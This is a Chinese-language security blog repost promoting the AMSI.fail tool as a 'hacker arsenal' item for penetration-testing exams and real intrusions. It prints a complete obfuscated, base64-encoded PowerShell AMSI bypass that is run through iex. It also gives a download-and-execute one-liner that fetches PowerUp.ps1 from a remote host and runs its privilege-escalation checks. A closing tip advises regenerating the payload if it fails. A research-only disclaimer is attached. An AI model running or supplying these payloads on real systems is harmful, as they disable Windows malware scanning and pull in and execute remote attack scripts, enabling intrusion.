黑客武器库 | AMSI.fail完美bypass AMSI

admin 2024年12月4日10:41:40评论7 views字数 5688阅读18分57秒阅读模式

0-简介

【OSCP必备】【OSEP必备】【实战必备】

amsi.fail是一款AMSI bypass神器

1-名称

https://amsi.fail/

2-来源

https://github.com/Flangvik/AMSI.fail

3-用法

打开https://amsi.fail/,点击“Generate Encoded”生成加密的powershell脚本,在目标机器上运行即可bypass AMSI。下面是一个例子,windows10下亲测可用:

[sySTem.tEXT.enCodinG]::UniCodE.gEtSTriNg([SySTEM.COnVeRT]::FROmBASe64StrING("IwBNAGEAdAB0ACAARwByAGEAZQBiAGUAcgBzACAAcwBlAGMAbwBuAGQAIABSAGUAZgBsAGUAYwB0AGkAbwBuACAAbQBlAHQAaABvAGQAIAAKACQAcwBiAE0AVQBGAF8AcAB0ADYAYQBoAHoAZABQAHAAMQBsAEUAQQA9ACQAbgB1AGwAbAA7ACQAXwBPAF8AegA5ADIAbQBhAHEARABBAFYAVwA2AE4AdwA9ACIAUwB5AHMAdABlAG0ALgAkACgAKAAnAE0A4ABuAOEAZwDqACcAKwAnAG0A6QBuAHQAJwApAC4AbgBvAHIATQBBAEwAaQBaAGUAKABbAEMASABBAHIAXQAoAFsAQgBZAHQARQBdADAAeAA0ADYAKQArAFsAQwBoAEEAUgBdACgAMQAxADEAKgA1ADUALwA1ADUAKQArAFsAYwBIAEEAUgBdACgAMQAxADQAKwA2ADAALQA2ADAAKQArAFsAQwBIAEEAcgBdACgAOQAzACsAMQA2ACkAKwBbAGMAaABhAHIAXQAoADYAOAApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMAaABhAHIAXQAoAFsAQgB5AHQARQBdADAAeAA1AGMAKQArAFsAQwBIAGEAUgBdACgAMQAxADIAKQArAFsAQwBIAGEAUgBdACgAMQAyADMAKQArAFsAQwBIAEEAUgBdACgAMQAxACsANgA2ACkAKwBbAEMAaABBAHIAXQAoADEAMQAwACkAKwBbAEMAaABBAFIAXQAoAFsAYgBZAFQARQBdADAAeAA3AGQAKQApAC4AJAAoACgAJwDAAPsAdAD1ACcAKwAnAG0A4gB0AO0AJwArACcA9ABuACcAKQAuAG4AbwByAE0AYQBsAEkAWgBlACgAWwBDAGgAQQByAF0AKABbAGIAWQB0AGUAXQAwAHgANAA2ACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQARQBdADAAeAA2AGYAKQArAFsAQwBIAEEAUgBdACgAWwBCAFkAdABlAF0AMAB4ADcAMgApACsAWwBDAGgAYQByAF0AKAA0ADYAKwA2ADMAKQArAFsAYwBoAEEAcgBdACgANgA4ACoAMQA0AC8AMQA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADUAYwApACsAWwBjAEgAQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANwAwACkAKwBbAGMASABBAFIAXQAoAFsAQgB5AFQARQBdADAAeAA3AGIAKQArAFsAQwBoAGEAcgBdACgAWwBCAFkAdABlAF0AMAB4ADQAZAApACsAWwBDAEgAQQBSAF0AKAA1ACsAMQAwADUAKQArAFsAYwBIAGEAcgBdACgAWwBCAHkAdABFAF0AMAB4ADcAZAApACkALgAkACgAWwBDAGgAYQBSAF0AKAAxADAAKwA1ADUAKQArAFsAQwBIAEEAUgBdACgAMQAwADkAKwA4ADkALQA4ADkAKQArAFsAYwBIAEEAUgBdACgAWwBiAFkAdABFAF0AMAB4ADcAMwApACsAWwBDAEgAQQByAF0AKABbAEIAWQB0AEUAXQAwAHgANgA5ACkAKwBbAEMASABBAHIAXQAoAFsAYgBZAFQAZQBdADAAeAA1ADUAKQArAFsAYwBIAEEAUgBdACgANAA0ACsANwAyACkAKwBbAGMAaABBAHIAXQAoAFsAYgB5AFQARQBdADAAeAA2ADkAKQArAFsAQwBoAEEAcgBdACgAWwBCAHkAVABFAF0AMAB4ADYAYwApACsAWwBDAEgAYQBSAF0AKAA2ADkAKwA0ADYAKQApACIAOwAkAHIAdgBwAHQAegBqAGQAdwB2AG4AeAB1AHQAagBxAHkAbwBiAGYAcAB2AD0AIgArACgAJwDpACcAKwAnAOwAJwArACcAYgAnACkALgBuAE8AUgBtAEEAbABJAHoAZQAoAFsAYwBoAEEAUgBdACgANwAwACoANQA4AC8ANQA4ACkAKwBbAEMASABBAHIAXQAoADQAOQArADYAMgApACsAWwBDAGgAQQByAF0AKAA3ADQAKwA0ADAAKQArAFsAQwBoAEEAcgBdACgAWwBiAHkAdABlAF0AMAB4ADYAZAApACsAWwBjAEgAQQByAF0AKAA2ADgAKwA5AC0AOQApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAEMASABBAHIAXQAoADMANgArADUANgApACsAWwBDAEgAYQBSAF0AKABbAGIAWQB0AGUAXQAwAHgANwAwACkAKwBbAGMASABBAHIAXQAoAFsAQgB5AFQAZQBdADAAeAA3AGIAKQArAFsAQwBoAEEAUgBdACgANwA3ACsAMwAxAC0AMwAxACkAKwBbAEMASABhAFIAXQAoADEAMQAwACsANQA0AC0ANQA0ACkAKwBbAGMASABhAHIAXQAoADEAMgA1ACsANAAwAC0ANAAwACkAIgA7AFsAVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBTAGwAZQBlAHAAKAAxADQANwA2ACkAOwBbAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAKAAiACQAKAAoACcAVwByAO4AdAAnACsAJwDqAM0AbgB0ACcAKwAnADMAMgAnACkALgBOAG8AcgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACkAKwBbAGMASABBAFIAXQAoADEAMQAxACkAKwBbAEMAaABhAFIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADIAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAdABFAF0AMAB4ADYAZAApACsAWwBjAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAYwBIAEEAcgBdACgANAA0ACsANAA4ACkAKwBbAEMASABhAHIAXQAoADEAMQAyACsAMwAwAC0AMwAwACkAKwBbAEMAaABhAHIAXQAoADEAMgAzACoANQA4AC8ANQA4ACkAKwBbAGMASABBAHIAXQAoADUANQArADIAMgApACsAWwBjAGgAQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANgBlACkAKwBbAEMASABBAHIAXQAoAFsAYgB5AFQAZQBdADAAeAA3AGQAKQApACIAKQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAkAF8ATwBfAHoAOQAyAG0AYQBxAEQAQQBWAFcANgBOAHcAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAQwBIAEEAUgBdACgAWwBiAHkAdABFAF0AMAB4ADYAMQApACsAWwBjAGgAYQByAF0AKAAxADAAOQArADcANwAtADcANwApACsAWwBDAGgAYQBSAF0AKABbAGIAeQB0AEUAXQAwAHgANwAzACkAKwBbAEMASABhAHIAXQAoADEAMAA1ACkAKwBbAGMASABhAHIAXQAoAFsAYgB5AHQARQBdADAAeAA0ADMAKQArAFsAQwBIAGEAcgBdACgAMQAxADEAKQArAFsAYwBIAEEAcgBdACgAWwBiAFkAVABlAF0AMAB4ADYAZQApACsAWwBjAGgAQQByAF0AKAAxADEANgArADIANwAtADIANwApACsAWwBDAEgAQQByAF0AKAAxADAAMQArADQAOAAtADQAOAApACsAWwBDAEgAYQBSAF0AKAAxADIAMAArADMANwAtADMANwApACsAWwBjAEgAQQByAF0AKABbAGIAWQB0AEUAXQAwAHgANwA0ACkAKQAiACwAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQAiAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAIgApAC4ARwBlAHQAVgBhAGwAdQBlACgAJABzAGIATQBVAEYAXwBwAHQANgBhAGgAegBkAFAAcAAxAGwARQBBACkALAAwAHgAMgBjADUAYQAzADAAZAA0ACkAOwAkAGgAYgBuAHEAcgBuAGMAYwBrAGIAYQB1AGQAYQB6AHgAYgBsAGIAdgBoAG0AYgBkAGcAZwBvAG0APQAiACsAKAAnAHMAbgBzACcAKwAnAHgAcgB5ACcAKQAuAG4ATwByAG0AQQBMAEkAWgBFACgAWwBjAGgAYQByAF0AKABbAEIAWQBUAEUAXQAwAHgANAA2ACkAKwBbAGMASABBAHIAXQAoADEAMQAxACoAMgAxAC8AMgAxACkAKwBbAGMAaABhAFIAXQAoAFsAQgBZAHQARQBdADAAeAA3ADIAKQArAFsAQwBIAEEAcgBdACgAWwBiAHkAVABlAF0AMAB4ADYAZAApACsAWwBDAEgAYQBSAF0AKABbAGIAWQB0AEUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAQwBIAEEAUgBdACgAWwBCAHkAdABFAF0AMAB4ADUAYwApACsAWwBDAEgAQQByAF0AKAAzADUAKwA3ADcAKQArAFsAYwBIAEEAcgBdACgAMQAxADAAKwAxADMAKQArAFsAYwBIAGEAUgBdACgANgArADcAMQApACsAWwBjAEgAYQBSAF0AKABbAGIAWQB0AGUAXQAwAHgANgBlACkAKwBbAGMAaABBAFIAXQAoAFsAYgBZAHQAZQBdADAAeAA3AGQAKQAiADsAWwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADEANgA5ADQAKQA="))|iex

后面再执行就可以bypass AMSI了

iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))Invoke-AllChecks

4-实际案例

加载PowerUp被禁止:

iex ((New-Object System.Net.WebClient).DownloadString("http://192.168.136.131/PowerUp.ps1"))

黑客武器库 | AMSI.fail完美bypass AMSI

生成bypass AMSI命令并执行:

https://amsi.fail/

黑客武器库 | AMSI.fail完美bypass AMSI

黑客武器库 | AMSI.fail完美bypass AMSI

执行成果,完美bypass AMSI

考试技巧:

https://amsi.fail/中的代码不一定每次都可以成功bypass,如果不成功再生成一个再执行即可

黑客武器库 | AMSI.fail完美bypass AMSI

 

 

原文始发于微信公众号(高级红队专家):黑客武器库 | AMSI.fail完美bypass AMSI

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月4日10:41:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   黑客武器库 | AMSI.fail完美bypass AMSIhttps://cn-sec.com/archives/3465810.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息